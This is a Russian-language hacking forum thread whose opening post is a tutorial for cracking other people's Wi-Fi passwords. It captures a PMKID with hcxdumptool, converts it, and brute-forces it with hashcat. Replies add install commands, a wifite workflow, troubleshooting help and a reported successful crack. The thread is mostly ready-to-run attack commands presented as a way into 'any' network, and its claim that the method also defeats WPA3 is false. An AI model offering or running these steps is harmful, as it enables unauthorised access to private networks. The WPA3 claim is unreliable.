Новый метод взлома wi-fi

Combat

Постоялец
ДРУЗЬЯ ФОРУМА
ЮБИЛЕЙНАЯ ЛЕНТА

Combat

Постоялец
ДРУЗЬЯ ФОРУМА
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
19 Окт 2018
Сообщения
815
Реакции
582
Репутация
0
Шалом хацкеры, все мы знаем о протоколе шифрования WPA2, который используется сейчас во всех запароленных точках доступа.

Мало кто из вас знает, что пару месяцев назад Wi-Fi Alliance представил новый протокол шифрования WPA3.

Это не только большой шаг в области безопасности, но еще и новые трудности со взломом.​


Пока протокол шифрования не распространился глобально, мы решили заранее решить вопрос с его взломом. И решили, друзья!

Теперь внимание - наш метод работает не только с новым WPA3 но и с распространенным повсеместно WPA2.

Способ будет актуален для взлома любой сети Wi-Fi прямо здесь и сейчас, а так же на долгое будущее.

Важное преимущество - нам не нужно перехватывать рукопожатие, а соответственно не нужно ждать, пока кто-то подключится к точке.

Приступим:

Все действия статьи буду выполнятся в Debian​


Подготовка

Устанавливаем на нашу машину(возможно уже у кого то есть часть этих инструментов из коробки):

1. airmon-ng + airodump-ng

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



2. hcxdumptool

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



3. hcxpcaptool

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



4. hashcat

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.



Продолжаем:



  • Первым делом запустим нашу карту в режим монитора.
sudo airmon-ng start wlan0



Имя своего wifi интерфейса можно посмотреть в набрав команду ifconfig (для меня это wlan0).

  • Далее начинаем захват пакетов с помощью утилиты airodump.
sudo airodump-ng wlan0mon

(wlna0mon - интерфейс монитора, который появится в списке ifconfig, после старта первой команды.)

Видим следующее:


  • Из списка выбираем более или менее устойчивый.
Далее сохраняем его BSSID

echo "98DED0EF7060" > filter.txt

Обратите внимание что BSSID мы записываем без ":"​


Теперь переходим к самому главному, друзья!



  • Первым шагом мы должны получить pmkid точки. Делается это так:
sudo hcxdumptool -o hash -i wlan0mon --filterlist=filter.txt --filtermode=2 --enable_status=1,2

Если вам интересны значения ключей, то вы можете почитать набрав hcxdumptool -h.

Основные --o hash - тут сохранится собственно сам pmkid. --i wlan0mon - интерфейс мониторящей карты. --filterlist - наш сохраненный bssid.

После того как ввели команду видим примерно следующее:


Как только увидим надпись

[FOUND PMKID]

Жмем CTRL + C и приступаем к расшифровке.

  • Приведем наш pmkid в удобочитаемый вид для hashcat
sudo hcxpcaptool -z hashtocrack hash

  • Если набрать
cat hashtocrack

  • То получим примерно следующее
ef2115548399c67c69639f04feaeebdb:98ded0ef7060:28565aba7224



  • Далее заряжаем наш Hascat
Мы будем перебирать пароли, состоящие из 8 символов (Брут).

Сделаем мы это следующей командой:

sudo hashcat -m 16800 hashtocrack -a 3 -w 3 '?d?d?d?d?d?d?d?d' --force

'?d?d?d?d?d?d?d?d' - это собственно маска. По маскам можете почитать доки hashcat

  • Команда для перебора по словарю
sudo hashcat -m 16800 hashtocrack wordlist.txt --force



У нас hashcat производит брут с использованием GPU (видеокарты), по маске из 8 цифр (это 10кк паролей), перебирает чуть меньше часа. По словарям тоже очень быстро работает.​
 

BadX

Интересующийся
PREMIUM USER
ДРУЗЬЯ ФОРУМА
ЮБИЛЕЙНАЯ ЛЕНТА

BadX

Интересующийся
PREMIUM USER
ДРУЗЬЯ ФОРУМА
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
8 Окт 2018
Сообщения
243
Реакции
187
Репутация
3

DaddyBear

Активный участник
ЮБИЛЕЙНАЯ ЛЕНТА

DaddyBear

Активный участник
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
11 Июн 2018
Сообщения
55
Реакции
10
Репутация
0
Как раз аппаратурку прикупил для вардрайвинга, респект за мануальчик)
 

Lola

Активный участник
ЮБИЛЕЙНАЯ ЛЕНТА

Lola

Активный участник
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
12 Дек 2018
Сообщения
56
Реакции
19
Репутация
0
Только встретились с линухом, туплю, подскажите, после ввода cat hashtocrack, пишет
cat: hashtocrack: No such file or directory
Что я делаю не так?
 

Lola

Активный участник
ЮБИЛЕЙНАЯ ЛЕНТА

Lola

Активный участник
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
12 Дек 2018
Сообщения
56
Реакции
19
Репутация
0
Тс, нужна твоя помощь, я не справляюсь, глядишь, в будущем вопросов меньше будет)
 

BadX

Интересующийся
PREMIUM USER
ДРУЗЬЯ ФОРУМА
ЮБИЛЕЙНАЯ ЛЕНТА

BadX

Интересующийся
PREMIUM USER
ДРУЗЬЯ ФОРУМА
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
8 Окт 2018
Сообщения
243
Реакции
187
Репутация
3
Только встретились с линухом, туплю, подскажите, после ввода cat hashtocrack, пишет
cat: hashtocrack: No such file or directory
Что я делаю не так?
Он же тебе пишет что не может найти файл hashtocrack. Значит ошибся гдето на этих этапах:
1 Самое главное поймать pmkid, дождаться в терминале сообщения "FOUND PMKID" в это время в домашней папке появится файл с именем "hash"(это и есть наш pmkid в формате pcapng)
2 Далее командой hcxpcaptool -z hashtocrack hash ты конвертируешь файл hash и на выходе должен получить, в тойже домашней папке файл hashtocrack.
3 В команде cat hashtocrack, cat - это просто утилита для просмотра файлов в терминале, ну а hashtocrack - сам хеш

Зайди в домашнюю папку и посмотри наличие файлов hash и hashtocrack. Еще бы не плохо было узнать на кокой ОС ты это все делаешь. Если на kali, то для упрощения можешь воспользоваться Wifite:
1 открываешь терминал, вводишь wifite, жмешь ентер
2 выбираешь нужную сеть, жмешь ентер (если у точки отключен wps, то начнется сразу захват хеша pmkid, если нет, то атаку по впс можно пропустить нажав ctrl+c)
3 в домашней директории в папке hs забираешь уже конвертированный для хешкета, хеш
 
  • Нравится
Реакции: Lola

Lola

Активный участник
ЮБИЛЕЙНАЯ ЛЕНТА

Lola

Активный участник
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
12 Дек 2018
Сообщения
56
Реакции
19
Репутация
0
Он же тебе пишет что не может найти файл hashtocrack. Значит ошибся гдето на этих этапах:
1 Самое главное поймать pmkid, дождаться в терминале сообщения "FOUND PMKID" в это время в домашней папке появится файл с именем "hash"(это и есть наш pmkid в формате pcapng)
2 Далее командой hcxpcaptool -z hashtocrack hash ты конвертируешь файл hash и на выходе должен получить, в тойже домашней папке файл hashtocrack.
3 В команде cat hashtocrack, cat - это просто утилита для просмотра файлов в терминале, ну а hashtocrack - сам хеш

Зайди в домашнюю папку и посмотри наличие файлов hash и hashtocrack. Еще бы не плохо было узнать на кокой ОС ты это все делаешь. Если на kali, то для упрощения можешь воспользоваться Wifite:
1 открываешь терминал, вводишь wifite, жмешь ентер
2 выбираешь нужную сеть, жмешь ентер (если у точки отключен wps, то начнется сразу захват хеша pmkid, если нет, то атаку по впс можно пропустить нажав ctrl+c)
3 в домашней директории в папке hs забираешь уже конвертированный для хешкета, хеш
Спасибо за ваш отзыв, надеюсь, на этом форуме много отзывчивых людей, а не только кликбейтные статьи с других бордов без какого либо пилотирования;
вечером обязательно попробую! Еще вопрос, словарь под pmkid состоит только из цифр? а какое количество символов в среднем?) Машинка маломощная, пробовались таблички пырита, полутора суток пырит батч на "скалатебя", результат нулевой, немного грустно с таких увертюр(
 

Serggik00

Местный житель
ПРОВЕРЕННЫЙ ПРОДАВЕЦ
ЮБИЛЕЙНАЯ ЛЕНТА

Serggik00

Местный житель
ПРОВЕРЕННЫЙ ПРОДАВЕЦ
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
31 Май 2018
Сообщения
957
Реакции
738
Репутация
22
Кто мне так поможет пошагово сделать на Кадачи получит от меня приз)
 

BadX

Интересующийся
PREMIUM USER
ДРУЗЬЯ ФОРУМА
ЮБИЛЕЙНАЯ ЛЕНТА

BadX

Интересующийся
PREMIUM USER
ДРУЗЬЯ ФОРУМА
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
8 Окт 2018
Сообщения
243
Реакции
187
Репутация
3
Кто мне так поможет пошагово сделать на Кадачи получит от меня приз)
Я могу помочь. Кадачи основан на дебиане, поэтому делается все точно по инструкции, единственное что надо будет сделать это установить aircrack-ng, hcxdumptool, hcxpcaptool и хэшкет - этот по желанию (удобней брутить из-под винды с графическим интерфейсом и заморочек с драйверами меньше). Скачаю сейчас кадачи, посмотрю его в виртуалке, может там уже какие-нибудь инструменты для работы с вайфаем предустановлены.
 

BadX

Интересующийся
PREMIUM USER
ДРУЗЬЯ ФОРУМА
ЮБИЛЕЙНАЯ ЛЕНТА

BadX

Интересующийся
PREMIUM USER
ДРУЗЬЯ ФОРУМА
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
8 Окт 2018
Сообщения
243
Реакции
187
Репутация
3
Serggik00 @Serggik00 , Видео пошаговой установки нужных пакетов в кадачи:
Для просмотра содержимого вам необходимо авторизоваться.

Код:
sudo apt-get update

sudo apt-get install aircrack-ng

git clone https://github.com/ZerBea/hcxdumptool
cd hcxdumptool/
make
sudo make install

sudo apt install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev
git clone https://github.com/ZerBea/hcxtools
cd hcxtools/
make
sudo make install

sudo apt-get install hashcat

git clone https://github.com/derv82/wifite2.git
cd wifite2
sudo python setup.py install
Далее нужно запустить wifite (на видео не стал писать, было бы видно мой мак адрес и сети соседей)
Код:
sudo wifite --kill
Далее ждем когда wifite найдет нужную сеть, нажимаем ctrl+c, вводим номер сети и забираем готовый хеш или хендшейк в домашней папке в папке hs. Далее расшифровка хэшкэтом. Будут вопросы, задавай, отвечу.
 
Последнее редактирование:

Lola

Активный участник
ЮБИЛЕЙНАЯ ЛЕНТА

Lola

Активный участник
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
12 Дек 2018
Сообщения
56
Реакции
19
Репутация
0
Гугл просит капчу ввести, не справляюсь) может кто подсказать, меняются ли и как консольные команды в виндовс конкретно для подбора по словарю?
 

BadX

Интересующийся
PREMIUM USER
ДРУЗЬЯ ФОРУМА
ЮБИЛЕЙНАЯ ЛЕНТА

BadX

Интересующийся
PREMIUM USER
ДРУЗЬЯ ФОРУМА
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
8 Окт 2018
Сообщения
243
Реакции
187
Репутация
3
Гугл просит капчу ввести, не справляюсь) может кто подсказать, меняются ли и как консольные команды в виндовс конкретно для подбора по словарю?
Да в командной строке надо так прописывать:

После того как перешли в папку с хэшкэтом, пишем "hashcat64.exe -m 16800" а далее в ковычках прописывам пути до pmkid хэша и словаря.
Под виндой для удобства можно пользовать HashcatGUI:

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

 

Serggik00

Местный житель
ПРОВЕРЕННЫЙ ПРОДАВЕЦ
ЮБИЛЕЙНАЯ ЛЕНТА

Serggik00

Местный житель
ПРОВЕРЕННЫЙ ПРОДАВЕЦ
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
31 Май 2018
Сообщения
957
Реакции
738
Репутация
22
Serggik00 @Serggik00 , Видео пошаговой установки нужных пакетов в кадачи:
[Скрытый контент]
Код:
sudo apt-get update

sudo apt-get install aircrack-ng

git clone https://github.com/ZerBea/hcxdumptool
cd hcxdumptool/
make
sudo make install

sudo apt install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev
git clone https://github.com/ZerBea/hcxtools
cd hcxtools/
make
sudo make install

sudo apt-get install hashcat

git clone https://github.com/derv82/wifite2.git
cd wifite2
sudo python setup.py install
Далее нужно запустить wifite (на видео не стал писать, было бы видно мой мак адрес и сети соседей)
Код:
sudo wifite --kill
Далее ждем когда wifite найдет нужную сеть, нажимаем ctrl+c, вводим номер сети и забираем готовый хеш или хендшейк в домашней папке в папке hs. Далее расшифровка хэшкэтом. Будут вопросы, задавай, отвечу.
Благодарю! Я уже понял кто в чем хорошо разбирается)
 

Lola

Активный участник
ЮБИЛЕЙНАЯ ЛЕНТА

Lola

Активный участник
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
12 Дек 2018
Сообщения
56
Реакции
19
Репутация
0
BadX @BadX , отлично, ваши рекоммендации выше выполнены, но почему то чувство завершенности меня не нашло) Хотя бы намекните, что мы должны увидеть?)
 

unitedkingdom

Интересующийся
PREMIUM USER
ЮБИЛЕЙНАЯ ЛЕНТА

unitedkingdom

Интересующийся
PREMIUM USER
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
21 Июн 2018
Сообщения
243
Реакции
166
Репутация
0
BadX @BadX , отлично, ваши рекоммендации выше выполнены, но почему то чувство завершенности меня не нашло) Хотя бы намекните, что мы должны увидеть?)
Товарищь командир вы похожа ушиблись кабинетом .
 
  • Нравится
Реакции: BadX

unitedkingdom

Интересующийся
PREMIUM USER
ЮБИЛЕЙНАЯ ЛЕНТА

unitedkingdom

Интересующийся
PREMIUM USER
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
21 Июн 2018
Сообщения
243
Реакции
166
Репутация
0

Lola

Активный участник
ЮБИЛЕЙНАЯ ЛЕНТА

Lola

Активный участник
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
12 Дек 2018
Сообщения
56
Реакции
19
Репутация
0
Какие-то у вас вопросы уж интересные
Вы где то заметили выуживание личной или конфеденциальной информации? Видно, что человек разбирается и ему не сложно подать общедоступную информацию в пережеванном виде начинающему разбираться нубу без ехидства, а наоборот, выказывая дружелюбность и терпение, за что ему честь и хвала от меня и будущих поколений, а какого помета вы отведали, что изволили делиться им с окружающими? Товарищ знаток, лучше бы подсказали, а не пиз.. водили вилами по воде. Если мои словоформы слишком сложны для вас, то вот вам графическое изображение. Внимание, вопрос: на какие результаты деятельности китикета мне стоило бы обратить внимание, чтобы достичь требуемого эффекта?
 
  • Нравится
Реакции: BadX

BadX

Интересующийся
PREMIUM USER
ДРУЗЬЯ ФОРУМА
ЮБИЛЕЙНАЯ ЛЕНТА

BadX

Интересующийся
PREMIUM USER
ДРУЗЬЯ ФОРУМА
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
8 Окт 2018
Сообщения
243
Реакции
187
Репутация
3
Lola @Lola , я после первого сообщения вопроса вообще не понял)
Статус "Cracked" говорит нам, что взлом прошел успешно, пароль от вайфая можно забрать после двоеточия (нарисовал стрелкой):
 

Lola

Активный участник
ЮБИЛЕЙНАЯ ЛЕНТА

Lola

Активный участник
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
12 Дек 2018
Сообщения
56
Реакции
19
Репутация
0
BadX @BadX , Да, это оно! Спасибо огромное!:danc:
 
  • Нравится
Реакции: BadX
Сверху